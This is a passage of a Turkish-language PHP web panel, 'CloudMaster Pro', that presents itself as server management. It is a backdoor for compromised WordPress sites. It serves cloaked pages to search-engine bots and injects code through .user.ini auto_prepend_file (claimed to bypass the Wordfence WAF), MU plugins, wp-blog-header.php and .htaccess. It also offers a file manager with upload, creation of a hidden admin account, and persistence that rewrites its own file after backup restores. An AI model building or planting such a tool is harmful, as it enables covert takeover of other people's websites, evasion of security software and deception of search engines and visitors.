$info = ['wp_loaded'=>$wp_loaded,'php'=>phpversion(),'server'=>(isset($_SERVER['SERVER_SOFTWARE']) ? $_SERVER['SERVER_SOFTWARE'] : '')];
if ($wp_loaded && function_exists('get_bloginfo')) {
$info['wp'] = get_bloginfo('version');
$info['site_url'] = get_site_url();
$info['site_name'] = get_bloginfo('name');
$info['plugins'] = count(get_option('active_plugins',[]));
$info['theme'] = get_stylesheet();
global $wpdb;
$info['users'] = (int)$wpdb->get_var("SELECT COUNT(*) FROM {$wpdb->users}");
$info['posts'] = (int)$wpdb->get_var("SELECT COUNT(*) FROM {$wpdb->posts} WHERE post_status='publish' AND post_type='post'");
$info['db_prefix'] = $wpdb->prefix;
}
$df = @disk_free_space(dirname(__FILE__));
$dt = @disk_total_space(dirname(__FILE__));
if ($df!==false) {
$info['disk_free'] = round($df/1073741824,2).' GB';
$info['disk_total'] = round($dt/1073741824,2).' GB';
$info['disk_used_pct'] = round((1-$df/$dt)*100,1).'%';
}
return $info;
}
// ══════════════════════════════════════════════════════
// LOGIN SAYFASI
// ══════════════════════════════════════════════════════
function cm_show_login($err='') {
header('Content-Type: text/html; charset=utf-8');
echo '<!DOCTYPE html><html lang="tr"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><title>CloudMaster</title>
<style>*{margin:0;padding:0;box-sizing:border-box}body{background:#0d1117;color:#e6edf3;font-family:-apple-system,BlinkMacSystemFont,"Segoe UI",sans-serif;min-height:100vh;display:flex;align-items:center;justify-content:center}.box{background:#161b22;border:1px solid #30363d;border-radius:14px;padding:48px 40px;width:100%;max-width:400px;box-shadow:0 16px 48px rgba(0,0,0,.4)}.logo{text-align:center;margin-bottom:32px}.logo h1{font-size:1.6em;color:#58a6ff;letter-spacing:-.5px}.logo p{color:#8b949e;font-size:.85em;margin-top:6px}input{width:100%;background:#0d1117;border:1px solid #30363d;border-radius:8px;color:#e6edf3;padding:12px 16px;font-size:1em;outline:none;transition:border-color .2s}input:focus{border-color:#58a6ff}button{width:100%;background:#238636;border:none;border-radius:8px;color:#fff;padding:13px;font-size:1em;cursor:pointer;margin-top:14px;font-weight:600;transition:background .2s}button:hover{background:#2ea043}label{display:block;color:#8b949e;font-size:.8em;margin-bottom:6px;text-transform:uppercase;letter-spacing:.4px}.err{background:#3d1a1a;border:1px solid #f85149;color:#f85149;padding:11px 14px;border-radius:8px;margin-bottom:16px;font-size:.9em}</style>
</head><body><div class="box"><div class="logo"><h1>⚡ CloudMaster Pro</h1><p>Sunucu Yönetim Paneli v'.CM_VERSION.'</p></div>'.
($err?"<div class=\"err\">❌ ".htmlspecialchars($err,ENT_QUOTES).'</div>':'').
'<form method="post"><label>Şifre</label><input type="password" name="cm_pass" placeholder="••••••••" autofocus><button type="submit">Giriş Yap →</button></form></div></body></html>';
}
// ══════════════════════════════════════════════════════
// ══════════════════════════════════════════════════════
// ANA HTML ÇIKTI
// ══════════════════════════════════════════════════════
// ══════════════════════════════════════════════════════
$tab = preg_replace('/[^a-z]/','',((isset($_GET['tab']) ? $_GET['tab'] : 'dashboard')));
$root = cm_root();
$site_url = cm_site_url();
$host = htmlspecialchars(isset($_SERVER['HTTP_HOST']) ? $_SERVER['HTTP_HOST'] : 'localhost',ENT_QUOTES);
// WP + plugin'lerin biriktirdigi stray output'u temizle, sadece bizim HTML ciksin
if (ob_get_level() > 0) ob_clean();
// HTML'den sonra PHP hata mesaji cikmamasi icin
@ini_set('display_errors', '0');
error_reporting(0);
?>
<!DOCTYPE html>
<html lang="tr">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width,initial-scale=1">
<title>CloudMaster Pro — <?= $host ?></title>
<style>
/* ── Reset ── */
*{margin:0;padding:0;box-sizing:border-box}
:root{--bg:#0d1117;--s1:#161b22;--s2:#21262d;--bd:#30363d;--tx:#e6edf3;--mu:#8b949e;--bl:#58a6ff;--gr:#3fb950;--rd:#f85149;--yl:#d29922;--pu:#bc8cff;}
body{background:var(--bg);color:var(--tx);font-family:-apple-system,BlinkMacSystemFont,"Segoe UI",sans-serif;font-size:14px;line-height:1.6;overflow-x:hidden}
a{color:var(--bl);text-decoration:none}a:hover{text-decoration:underline}
code{background:var(--s2);border:1px solid var(--bd);border-radius:4px;padding:1px 6px;font-size:.85em;font-family:monospace}
pre{background:var(--s2);border:1px solid var(--bd);border-radius:6px;padding:14px;overflow:auto;font-size:12px;font-family:monospace;color:#d4d4d4;white-space:pre-wrap;word-break:break-all}
/* ── Layout ── */
.sidebar{position:fixed;left:0;top:0;bottom:0;width:224px;background:var(--s1);border-right:1px solid var(--bd);display:flex;flex-direction:column;z-index:100}
.sl-logo{padding:20px 18px 16px;border-bottom:1px solid var(--bd)}.sl-logo h2{font-size:.95em;color:var(--bl);font-weight:700}.sl-logo p{font-size:.72em;color:var(--mu);margin-top:3px}
.sl-nav{flex:1;overflow-y:auto;padding:6px 0}
.ni{display:flex;align-items:center;gap:10px;padding:9px 14px;color:var(--mu);cursor:pointer;border-radius:7px;margin:0 8px 2px;border:none;background:none;width:calc(100% - 16px);text-align:left;font-size:.88em;transition:all .15s;font-family:inherit}
.ni:hover{background:var(--s2);color:var(--tx)}.ni.active{background:var(--s2);color:var(--bl);font-weight:600}
.ni .ic{font-size:1.05em;width:20px;text-align:center}
.sl-foot{padding:12px 16px;border-top:1px solid var(--bd);font-size:.72em;color:var(--mu)}
.wp-dot{display:inline-flex;align-items:center;gap:5px;padding:3px 9px;border-radius:10px;font-size:.72em}.wp-on{background:#0d2a0d;color:var(--gr);border:1px solid #2ea043}.wp-off{background:var(--s2);color:var(--mu);border:1px solid var(--bd)}
.main{margin-left:224px;min-height:100vh;display:flex;flex-direction:column}
.topbar{height:50px;border-bottom:1px solid var(--bd);display:flex;align-items:center;justify-content:space-between;padding:0 22px;background:var(--s1);position:sticky;top:0;z-index:90}
.topbar h1{font-size:.95em;font-weight:600}.content{flex:1;padding:22px}
/* ── Cards & Grid ── */
.card{background:var(--s1);border:1px solid var(--bd);border-radius:8px;padding:18px;margin-bottom:14px}
.card-title{font-size:.75em;font-weight:700;color:var(--mu);text-transform:uppercase;letter-spacing:.6px;margin-bottom:12px}
.grid2{display:grid;grid-template-columns:1fr 1fr;gap:14px}
.grid3{display:grid;grid-template-columns:repeat(auto-fit,minmax(200px,1fr));gap:12px}
.stat{background:var(--s1);border:1px solid var(--bd);border-radius:8px;padding:14px}
.stat .lbl{font-size:.72em;color:var(--mu);text-transform:uppercase;letter-spacing:.5px}
.stat .val{font-size:1.5em;font-weight:700;margin-top:3px}
.stat .sub{font-size:.78em;color:var(--mu);margin-top:2px}
/* ── Buttons ── */
.btn{display:inline-flex;align-items:center;gap:5px;padding:6px 13px;border-radius:6px;border:1px solid var(--bd);background:var(--s2);color:var(--tx);cursor:pointer;font-size:.82em;transition:all .15s;font-family:inherit;white-space:nowrap}
.btn:hover{background:var(--bd)}.btn:disabled{opacity:.45;cursor:default}
.btn-p{background:#238636;border-color:#2ea043;color:#fff}.btn-p:hover:not(:disabled){background:#2ea043}
.btn-d{background:transparent;border-color:var(--rd);color:var(--rd)}.btn-d:hover:not(:disabled){background:#3d1a1a}
.btn-sm{padding:3px 9px;font-size:.78em}
/* ── Badges ── */
.badge{display:inline-flex;align-items:center;gap:3px;padding:2px 8px;border-radius:10px;font-size:.72em;font-weight:700}
.bg{background:#0d2a0d;color:var(--gr);border:1px solid #2ea043}
.br{background:#3d1a1a;color:var(--rd);border:1px solid #f85149}
.by{background:#3d2f00;color:var(--yl);border:1px solid #d29922}
.bb{background:#0d1a2d;color:var(--bl);border:1px solid #1f6feb}
.bm{background:var(--s2);color:var(--mu);border:1px solid var(--bd)}
/* ── Forms ── */
input,textarea,select{background:var(--s2);border:1px solid var(--bd);border-radius:6px;color:var(--tx);padding:7px 11px;font-size:.88em;outline:none;font-family:inherit;transition:border-color .2s;width:100%}
input:focus,textarea:focus,select:focus{border-color:var(--bl)}
textarea{resize:vertical;font-family:monospace;font-size:12px}
label{display:block;color:var(--mu);font-size:.75em;margin-bottom:4px;font-weight:600;text-transform:uppercase;letter-spacing:.3px}
.fr{margin-bottom:13px}
/* ── Method rows ── */
.mrow{display:flex;align-items:flex-start;gap:12px;padding:14px 0;border-bottom:1px solid var(--bd)}
.mrow:last-child{border-bottom:none}
.minfo{flex:1}.minfo strong{display:block;margin-bottom:2px;font-size:.9em}
.minfo small{color:var(--mu);font-size:.8em;line-height:1.4}
/* ── File manager ── */
.fm-top{display:flex;align-items:center;gap:8px;padding:10px 0 12px;border-bottom:1px solid var(--bd);margin-bottom:10px;flex-wrap:wrap}
.fp{flex:1;font-size:.78em;color:var(--mu);font-family:monospace;background:var(--s2);padding:5px 10px;border-radius:4px;border:1px solid var(--bd);min-width:0;overflow:hidden;text-overflow:ellipsis;white-space:nowrap}
.ft{width:100%;border-collapse:collapse}.ft th{text-align:left;font-size:.72em;color:var(--mu);text-transform:uppercase;padding:7px 9px;border-bottom:1px solid var(--bd);font-weight:600}
.ft td{padding:7px 9px;border-bottom:1px solid #1c2128;vertical-align:middle}
.ft tr:hover td{background:var(--s2)}.fn{display:flex;align-items:center;gap:7px;cursor:pointer;color:var(--tx);max-width:400px}
.fn:hover{color:var(--bl)}.fic{width:20px;text-align:center;font-size:1.05em}
.fsz,.fdt{font-size:.78em;color:var(--mu);white-space:nowrap}.fact{display:flex;gap:4px;white-space:nowrap}
/* ── Test boxes ── */
.tbox{border-radius:7px;padding:14px;margin-bottom:10px}
.tok{background:#0d2a0d;border:1px solid var(--gr)}.tfail{background:#3d1a1a;border:1px solid var(--rd)}.tunk{background:#3d2f00;border:1px solid var(--yl)}
/* ── Issues ── */
.iss{border-radius:6px;padding:13px;margin-bottom:9px;border-left:4px solid}
.iss-w{background:#2d2600;border-color:var(--yl)}.iss-i{background:#0d1a2d;border-color:var(--bl)}.iss-e{background:#3d1a1a;border-color:var(--rd)}
.iss-title{font-weight:600;margin-bottom:5px}.iss-fix{background:#0d1117;border-radius:4px;padding:9px;margin-top:7px;font-size:.83em;font-family:monospace;color:var(--mu);white-space:pre-wrap}
/* ── Toast ── */
#toast{position:fixed;bottom:22px;right:22px;z-index:9999;display:flex;flex-direction:column;gap:7px}
.ti{padding:11px 16px;border-radius:8px;font-size:.88em;min-width:260px;max-width:380px;animation:si .25s ease;border:1px solid}
.ts{background:#0d2a0d;border-color:var(--gr);color:var(--gr)}.te{background:#3d1a1a;border-color:var(--rd);color:var(--rd)}.tinfo{background:#0d1a2d;border-color:var(--bl);color:var(--bl)}
@keyframes si{from{transform:translateX(100%);opacity:0}to{transform:translateX(0);opacity:1}}
/* ── Modal ── */
.modal{display:none;position:fixed;inset:0;background:rgba(0,0,0,.75);z-index:1000;align-items:center;justify-content:center}
.modal.open{display:flex}.mbox{background:var(--s1);border:1px solid var(--bd);border-radius:10px;width:90%;max-width:960px;max-height:90vh;display:flex;flex-direction:column}
.mh{display:flex;align-items:center;justify-content:space-between;padding:14px 18px;border-bottom:1px solid var(--bd);font-weight:600}
.mb{flex:1;overflow:auto;padding:16px 18px}.mf{padding:11px 18px;border-top:1px solid var(--bd);display:flex;gap:7px;justify-content:flex-end}
/* ── Scrollbar ── */
::-webkit-scrollbar{width:5px;height:5px}::-webkit-scrollbar-track{background:var(--s1)}::-webkit-scrollbar-thumb{background:var(--bd);border-radius:3px}
/* ── Info table ── */
.info-table{width:100%;border-collapse:collapse;font-size:.85em}
.info-table td{padding:6px 0;border-bottom:1px solid var(--bd)}.info-table td:first-child{color:var(--mu);width:160px}
.info-table td:last-child{font-family:monospace}
</style>
</head>
<body>
<!-- ── SIDEBAR ── -->
<aside class="sidebar">
<div class="sl-logo">
<h2>⚡ CloudMaster Pro</h2>
<p><?= $host ?></p>
</div>
<nav class="sl-nav">
<?php
$nav_items = [
'dashboard' => ['🏠','Dashboard'],
'cloak' => ['🎭','Cloak Yönetimi'],
'bottest' => ['🧪','Bot Test'],
'diagnose' => ['🔍','Teşhis & Cache'],
'litespeed' => ['⚡','LiteSpeed'],
'files' => ['📁','Dosya Yöneticisi'],
'admin' => ['👤','Gizli Admin'],
];
foreach ($nav_items as $t => $ni):
$ic = $ni[0]; $lbl = $ni[1];
?><button class="ni <?= $tab===$t?'active':'' ?>" onclick="switchTab('<?= $t ?>')">
<span class="ic"><?= $ic ?></span><?= $lbl ?>
</button><?php endforeach; ?>
</nav>
<div class="sl-foot">
<div class="wp-dot <?= $wp_loaded?'wp-on':'wp-off' ?>"><?= $wp_loaded?'● WP Yüklü':'○ Standalone' ?></div><br><br>
<a href="?logout=1" style="color:var(--mu)">Çıkış Yap</a> · v<?= CM_VERSION ?>
</div>
</aside>
<!-- ── MAIN ── -->
<main class="main">
<div class="topbar">
<h1 id="tab-title">Dashboard</h1>
<div style="display:flex;align-items:center;gap:10px">
<span style="font-size:.78em;color:var(--mu)"><?= htmlspecialchars($site_url,ENT_QUOTES) ?></span>
</div>
</div>
<div class="content">
<div id="toast"></div>
<!-- ═══════════ DASHBOARD ═══════════ -->
<div id="tab-dashboard" class="tab-pane">
<div class="grid3" id="stats-grid" style="margin-bottom:16px">
<div class="stat"><div class="lbl">PHP</div><div class="val" style="font-size:1.2em"><?= phpversion() ?></div></div>
<div class="stat"><div class="lbl">Sunucu</div><div class="val" style="font-size:.95em;margin-top:6px"><?= htmlspecialchars(explode('/',(isset($_SERVER['SERVER_SOFTWARE']) ? $_SERVER['SERVER_SOFTWARE'] : ''))[0],ENT_QUOTES) ?></div></div>
<div class="stat"><div class="lbl">WordPress</div><div class="val" style="font-size:1.2em" id="d-wp"><?= $wp_loaded&&function_exists('get_bloginfo')?get_bloginfo('version'):'—' ?></div><div class="sub" id="d-wpname"><?= $wp_loaded&&function_exists('get_bloginfo')?get_bloginfo('name'):'Yüklenmedi' ?></div></div>
<div class="stat"><div class="lbl">Disk</div><div class="val" style="font-size:1.1em" id="d-disk">...</div><div class="sub" id="d-disksub"></div></div>
<div class="stat"><div class="lbl">Aktif Eklentiler</div><div class="val" id="d-plugins">—</div></div>
<div class="stat"><div class="lbl">Kullanıcılar</div><div class="val" id="d-users">—</div></div>
</div>
<!-- Sistem Sağlığı Kartı -->
<div class="card" id="health-card" style="margin-bottom:16px;border-color:var(--bd)">
<div style="display:flex;justify-content:space-between;align-items:center;flex-wrap:wrap;gap:8px;margin-bottom:12px">
<div class="card-title" style="margin:0">🛡️ Sistem Sağlığı</div>
<div style="display:flex;gap:8px">
<button class="btn btn-sm" onclick="healthCheck()" id="health-btn">🔍 Kontrol Et</button>
<button class="btn btn-p btn-sm" onclick="autoRepair()" id="repair-btn">🔧 Oto-Onarım</button>
</div>
</div>
<div id="health-results">
<p style="color:var(--mu);font-size:.84em">Sistem durumunu kontrol etmek için butona tıklayın.</p>
</div>
</div>
<div class="grid2">
<div class="card">
<div class="card-title">Hızlı İşlemler</div>
<div style="display:flex;flex-direction:column;gap:8px">
<button class="btn btn-p" onclick="switchTab('cloak')">🎭 Cloak Yönet</button>
<button class="btn" onclick="switchTab('diagnose');setTimeout(runDiagnose,100)">🔍 Teşhis Çalıştır</button>
<button class="btn" onclick="switchTab('litespeed')">⚡ LiteSpeed</button>
<button class="btn" onclick="switchTab('files')">📁 Dosya Yöneticisi</button>
<button class="btn" onclick="switchTab('admin')">👤 Gizli Admin Oluştur</button>
</div>
</div>
<div class="card" style="border-color:var(--yl)">
<div class="card-title" style="color:var(--yl)">🔒 Backup Koruma</div>
<p style="color:var(--mu);font-size:.83em;margin-bottom:12px">
Çalışan backup alıp restore edince wp-security.php siliniyor mu? Bu özelliği aktif et —
WordPress her yüklendiğinde MU Plugin içindeki kaynak koddan wp-security.php'yi otomatik geri yazar.
</p>
<div style="display:flex;align-items:center;gap:10px;flex-wrap:wrap">
<span id="persist-badge" class="badge bm">Kontrol ediliyor...</span>
<button class="btn btn-p btn-sm" id="persist-install-btn" onclick="persistInstall()">🛡️ Korumayı Aktif Et</button>
<button class="btn btn-sm" id="persist-update-btn" onclick="persistInstall()" style="display:none">🔄 Güncelle</button>
<button class="btn btn-d btn-sm" id="persist-remove-btn" onclick="persistRemove()" style="display:none">✕ Kaldır</button>
</div>
<div id="persist-res" style="margin-top:10px;font-size:.82em;white-space:pre-wrap;color:var(--mu)"></div>
</div>
<div class="card">
<div class="card-title">Sunucu Bilgisi</div>
<table class="info-table">
<?php foreach(['PHP Sürümü'=>phpversion(),'İşletim Sistemi'=>PHP_OS,'Upload Max'=>ini_get('upload_max_filesize'),'POST Max'=>ini_get('post_max_size'),'Memory Limit'=>ini_get('memory_limit'),'Root Dizin'=>$root,'Doc Root'=>(isset($_SERVER['DOCUMENT_ROOT']) ? $_SERVER['DOCUMENT_ROOT'] : '?')] as $k=>$v): ?>
<tr><td><?= htmlspecialchars($k,ENT_QUOTES) ?></td><td><?= htmlspecialchars($v,ENT_QUOTES) ?></td></tr>
<?php endforeach; ?>
</table>
</div>
</div>
</div>
<!-- ═══════════ CLOAK ═══════════ -->
<div id="tab-cloak" class="tab-pane" style="display:none">
<div class="card">
<div class="card-title">Cloak Dosyası</div>
<p style="color:var(--mu);font-size:.84em;margin-bottom:12px">
Botlar bu dosyayı görür. İstediğin bir PHP dosya adını seç — <code>amp.php</code> yerine <code>wp-plugin.php</code>, <code>health-check.php</code> vb.
Aktif cloak yöntemlerini değiştirmeden önce yenile butonuna bas.
</p>
<div style="display:flex;gap:8px;align-items:flex-end;flex-wrap:wrap;margin-bottom:12px">
<div>
<label style="font-size:.8em;color:var(--mu);display:block;margin-bottom:4px">Cloak Dosya Adı</label>
<div style="display:flex;gap:6px">
<input type="text" id="cloak-file-input" value="<?= htmlspecialchars(cm_cloak_name(),ENT_QUOTES) ?>" style="width:200px" placeholder="amp.php">
<button class="btn btn-p btn-sm" onclick="setCloakFile()">✅ Kaydet</button>
</div>
</div>
<span id="amp-badge" class="badge bm">Kontrol ediliyor...</span>
</div>
<div style="display:flex;gap:8px;align-items:center;flex-wrap:wrap">
<button class="btn btn-p btn-sm" onclick="createAmp()">⚡ Cloak Dosyasını Oluştur / Güncelle</button>
<button class="btn btn-sm" onclick="openAmpInFM()">✏️ İçeriği Düzenle</button>
<a id="amp-link" href="#" target="_blank" class="btn btn-sm">🌐 Dosyayı Aç</a>
</div>
</div>
<div class="card">
<div class="card-title">Bypass Yöntemleri — Güçlüden Zayıfa</div>
<p style="color:var(--mu);font-size:.83em;margin-bottom:14px">Her yöntem bağımsız çalışır. Birini aktif et → Test Et. Çalışmıyorsa kaldır, sıradakini dene.</p>
<div id="methods-wrap">
<?php
$methods=[
'user_ini' =>['🥇','.user.ini (auto_prepend_file)','PHP\'den önce çalışır. Wordfence WAF dahil her şeyi bypass eder. <strong>En güçlü yöntem.</strong>'],
'mu_plugin' =>['🥈','MU Plugin','wp-content/mu-plugins/ klasörüne yazar. Tüm eklentilerden önce çalışır.'],
'wp_blog_header' =>['🥉','wp-blog-header.php','WordPress yüklenmeden önce çalışır. LiteSpeed cache\'i bypass edebilir.'],
'htaccess' =>['4️⃣','.htaccess RewriteRule','Apache/LiteSpeed seviyesinde yönlendirir. PHP\'ye girmeden çalışır.'],
];
foreach ($methods as $k=>$m): $medal=$m[0]; $name=$m[1]; $desc=$m[2]; ?>
<div class="mrow" id="mrow-<?= $k ?>">
<span style="font-size:1.4em;line-height:1"><?= $medal ?></span>
<div class="minfo">
<strong><?= htmlspecialchars($name,ENT_QUOTES) ?></strong>
<small><?= $desc ?></small>
</div>
<span id="mst-<?= $k ?>" class="badge bm">...</span>
<div style="display:flex;gap:6px;flex-shrink:0">
<button id="mapply-<?= $k ?>" class="btn btn-p btn-sm" onclick="cloakApply('<?= $k ?>')">Aktif Et</button>
<button id="mremov-<?= $k ?>" class="btn btn-d btn-sm" onclick="cloakRemove('<?= $k ?>')" style="display:none">Kaldır</button>
<button class="btn btn-sm" onclick="switchTab('bottest');setTimeout(runBotTest,100)" title="Bot Testi Yap">🧪</button>
</div>
</div>
<?php endforeach; ?>
</div>
</div>
<div class="card" style="border-left:3px solid var(--ye)">
<div class="card-title">⚠️ Normal Kullanıcılar Cloak Görüyorsa — Acil Düzeltme</div>
<p style="color:var(--mu);font-size:.84em;margin-bottom:10px">
Bu durum genellikle <strong>LiteSpeed / Varnish cache'in bot yanıtını önbelleğe alıp normal kullanıcılara servis etmesinden</strong> kaynaklanır.
Aşağıdaki buton tüm aktif cloak yöntemlerini <strong>geliştirilmiş cache-bypass başlıkları</strong> ile yeniden yazar
ve LiteSpeed cache'ini temizler.
</p>
<div style="background:var(--bg2);border-radius:7px;padding:10px 12px;margin-bottom:12px;font-size:.81em;color:var(--mu)">
<strong style="color:var(--ye)">Eklenen düzeltmeler:</strong><br>
✅ <code>X-LiteSpeed-Cache-Control: no-cache, no-store</code> — LiteSpeed bu yanıtı önbelleğe almaz<br>
✅ <code>Vary: User-Agent</code> — Cache sistemleri bot/insan ayrımı yapar<br>
✅ <strong>WordPress login cookie kontrolü</strong> — Giriş yapmış kullanıcılar asla cloak görmez<br>
✅ <code>googlebot</code> keliği yerine daha spesifik UA eşleşmesi (yanlış pozitif önlenir)<br>
✅ <code>.htaccess</code> — <code>wordpress_logged_in</code> cookie varsa bypass kuralı eklendi
</div>
<div style="display:flex;gap:8px;flex-wrap:wrap">
<button class="btn" style="background:linear-gradient(135deg,#e67e22,#d35400);color:#fff;font-weight:600" onclick="cloakRefresh()">
🔄 Cloak Kodu Yenile + Cache Temizle
</button>
<button class="btn btn-sm" onclick="switchTab('bottest');setTimeout(runBotTest,100)">🧪 Sonra Test Et</button>
</div>
<div id="refresh-result" style="margin-top:10px;font-size:.82em;display:none"></div>
</div>
</div>
<!-- ═══════════ BOT TEST ═══════════ -->
<div id="tab-bottest" class="tab-pane" style="display:none">
<div class="card">
<div class="card-title">Gerçek Bot Testi</div>
<p style="color:var(--mu);font-size:.85em;margin-bottom:12px">Sunucu kendi sitesine farklı bot User-Agent'ları ile HTTP isteği atar. Simülasyon değil — gerçek yanıt.</p>
<div style="display:flex;gap:8px;margin-bottom:14px;align-items:flex-end;flex-wrap:wrap">
<div style="flex:1;min-width:280px">
<label>Test URL</label>
<input type="text" id="test-url" value="<?= htmlspecialchars($site_url.'/',ENT_QUOTES) ?>">
</div>
<button class="btn btn-p" onclick="runBotTest()">▶ Testi Başlat</button>
</div>
<div id="bot-results"></div>
</div>
<div class="card">
<div class="card-title">Google Araçları</div>
<div style="display:flex;gap:8px;flex-wrap:wrap">
<a href="https://search.google.com/test/rich-results?url=<?= urlencode($site_url.'/') ?>" target="_blank" class="btn">🔍 Rich Results — Ana Sayfa</a>
<a href="https://search.google.com/test/rich-results?url=<?= urlencode($site_url.'/'.cm_cloak_name()) ?>" target="_blank" class="btn">🔍 Rich Results — <?= htmlspecialchars(cm_cloak_name(),ENT_QUOTES) ?></a>
<a href="https://search.google.com/search-console" target="_blank" class="btn">📊 Search Console</a>
</div>
</div>
</div>
<!-- ═══════════ TEŞHİS ═══════════ -->
<div id="tab-diagnose" class="tab-pane" style="display:none">
<div style="display:flex;gap:8px;margin-bottom:14px">
<button class="btn btn-p" onclick="runDiagnose()">🔍 Teşhis Başlat</button>
</div>
<div id="diag-out"><p style="color:var(--mu)">Teşhis başlatmak için butona tıklayın.</p></div>
</div>
<!-- ═══════════ DOSYA YÖNETİCİSİ ═══════════ -->
<div id="tab-files" class="tab-pane" style="display:none">
<div class="card">
<div class="fm-top">
<span class="fp" id="fm-path"><?= htmlspecialchars($root,ENT_QUOTES) ?></span>
<button class="btn btn-sm" onclick="fmUp()">⬆</button>
<button class="btn btn-sm" onclick="fmRefresh()">🔄</button>
<button class="btn btn-p btn-sm" onclick="showUpload()">📤 Yükle</button>
<button class="btn btn-sm" onclick="showNewFile()">📄 Yeni Dosya</button>
<button class="btn btn-sm" onclick="showMkdir()">📁 Yeni Klasör</button>
</div>
<div id="fm-body"><p style="color:var(--mu)">Yükleniyor...</p></div>
</div>
</div>
<!-- ═══════════ LITESPEED ═══════════ -->
<div id="tab-litespeed" class="tab-pane" style="display:none">
<!-- Evrensel Cache Temizleyici -->
<div class="card" style="border-color:var(--bl);margin-bottom:14px">
<div class="card-title" style="color:var(--bl)">🌐 Evrensel Cache Temizleyici</div>
<p style="color:var(--mu);font-size:.83em;margin-bottom:12px">
LiteSpeed, W3TC, WP Rocket, WP Super Cache, PHP OPCache, Redis, Memcached, Nginx FastCGI ve WP Transient — aktif olan <strong>hepsini</strong> tek tikla temizler.
</p>
<button class="btn btn-p" onclick="cacheUniversal()" id="cache-univ-btn">🧹 Tum Cache Sistemlerini Temizle</button>
<div id="cache-univ-res" style="margin-top:12px;font-size:.82em;white-space:pre-wrap;font-family:monospace;line-height:1.7"></div>
</div>
<!-- Bireysel Cache Modulleri -->
<div class="card" style="margin-bottom:14px">
<div class="card-title">Bireysel Cache Temizleme</div>
<div style="display:grid;grid-template-columns:repeat(auto-fill,minmax(200px,1fr));gap:8px;margin-bottom:12px">
<button class="btn btn-sm" onclick="cacheModule('cache_w3tc','W3 Total Cache')">🗑 W3 Total Cache</button>
<button class="btn btn-sm" onclick="cacheModule('cache_wprocket','WP Rocket')">🗑 WP Rocket</button>
<button class="btn btn-sm" onclick="cacheModule('cache_wpsc','WP Super Cache')">🗑 WP Super Cache</button>
<button class="btn btn-sm" onclick="cacheModule('cache_opcache','PHP OPCache')">🗑 PHP OPCache</button>
<button class="btn btn-sm" onclick="cacheModule('cache_redis','Redis / Memcached')">🗑 Redis / Memcached</button>
<button class="btn btn-sm" onclick="cacheModule('cache_transients','WP Transients')">🗑 WP Transients</button>
<button class="btn btn-sm" onclick="cacheModule('cache_nginx','Nginx Cache')">🗑 Nginx Cache</button>
<button class="btn btn-sm" onclick="cacheModule('ls_purge_cache','LiteSpeed Cache')">🗑 LiteSpeed</button>
</div>
<div id="cache-single-res" style="font-size:.82em;white-space:pre-wrap;font-family:monospace;color:var(--mu)"></div>
</div>
<!-- Oto Duzelt Butonu -->
<div class="card" style="border-color:var(--yl);margin-bottom:14px">
<div class="card-title" style="color:var(--yl)">⚡ LiteSpeed — Tek Tikla Tam Duzelt</div>
<p style="color:var(--mu);font-size:.83em;margin-bottom:12px">
Tum LiteSpeed bypass islemlerini otomatik uygular: .htaccess kurali, PHP header, .ls-conf, cache temizleme, plugin ayarlari (WP yuklu ise).
</p>
<button class="btn btn-p" onclick="lsAutoFix()" id="ls-auto-btn">⚡ LiteSpeed Duzeltmelerini Uygula</button>
<div id="ls-auto-res" style="margin-top:12px;font-size:.82em;white-space:pre-wrap;font-family:monospace"></div>
</div>
<!-- Teshis -->
<div class="card">
<div class="card-title">Teshis</div>
<div style="display:flex;gap:8px;margin-bottom:14px">
<button class="btn btn-p btn-sm" onclick="lsStatus()">🔍 Teshis Calistir</button>
</div>
<div id="ls-status-out"><p style="color:var(--mu);font-size:.85em">Teshis icin butona tiklayin.</p></div>
</div>
<!-- Adim adim islemler -->
<div class="grid2" style="margin-top:14px">
<div class="card">
<div class="card-title">.htaccess Bot Bypass Kurali</div>
<p style="color:var(--mu);font-size:.82em;margin-bottom:10px">
LiteSpeed'e "botlar icin cache kullanma" diyen Apache/LS kurali ekler. En temel ve en etkili adim.
</p>
<pre style="font-size:10px;margin-bottom:10px"><IfModule LiteSpeed>
RewriteCond %{HTTP_USER_AGENT} (googlebot|bot) [NC]
RewriteRule .* - [E=Cache-Control:no-store,L]
</IfModule></pre>
<button class="btn btn-p btn-sm" onclick="lsFixHtaccess()">Ekle / Guncelle</button>
<div id="ls-ht-res" style="margin-top:8px;font-size:.82em;white-space:pre-wrap"></div>
</div>
<div class="card">
<div class="card-title">PHP Header Duzeltme</div>
<p style="color:var(--mu);font-size:.82em;margin-bottom:10px">
Aktif cloak dosyalarina (cm-prepend.php, MU plugin, wp-blog-header.php) X-LiteSpeed-Cache-Control: no-cache header'i ekler.
</p>
<pre style="font-size:10px;margin-bottom:10px">header('X-LiteSpeed-Cache-Control:
no-cache, no-store, max-age=0');</pre>
<button class="btn btn-p btn-sm" onclick="lsFixHeaders()">Header Ekle</button>
<div id="ls-hdr-res" style="margin-top:8px;font-size:.82em;white-space:pre-wrap"></div>
</div>
<div class="card">
<div class="card-title">.ls-conf (Dizin Seviyesi)</div>
<p style="color:var(--mu);font-size:.82em;margin-bottom:10px">
WordPress root'una .ls-conf dosyasi olusturur. LiteSpeed bu dizin icin cache'i devre disi birakir.
</p>
<pre style="font-size:10px;margin-bottom:10px"><IfModule LiteSpeed>
CacheByDefault 0
</IfModule></pre>
<button class="btn btn-p btn-sm" onclick="lsCreateConf()">Olustur</button>
<div id="ls-conf-res" style="margin-top:8px;font-size:.82em;white-space:pre-wrap"></div>
</div>
<div class="card">
<div class="card-title">Cache Temizle (Hard Purge)</div>
<p style="color:var(--mu);font-size:.82em;margin-bottom:10px">
Sunucudaki LiteSpeed cache dosyalarini dogrudan siler. Plugin uzerinden de purge tetikler. Hemen etkili olur.
</p>
<div id="ls-cache-dirs" style="margin-bottom:10px;font-size:.8em;color:var(--mu)">...</div>
<button class="btn btn-d btn-sm" onclick="lsPurge()">🗑 Cache Temizle</button>
<div id="ls-purge-res" style="margin-top:8px;font-size:.82em;white-space:pre-wrap"></div>
</div>
<div class="card">
<div class="card-title">Plugin Ayarlari (WP DB)</div>
<p style="color:var(--mu);font-size:.82em;margin-bottom:10px">
LiteSpeed Cache plugin'in DB ayarlarini yazar: crawler kapat, bot UA exclusion ekle, /amp.php'yi cache disina al.
</p>
<div id="ls-plugin-status" style="margin-bottom:10px;font-size:.8em;color:var(--mu)">...</div>
<button class="btn btn-p btn-sm" onclick="lsPluginConfig()">Ayarlari Yaz</button>
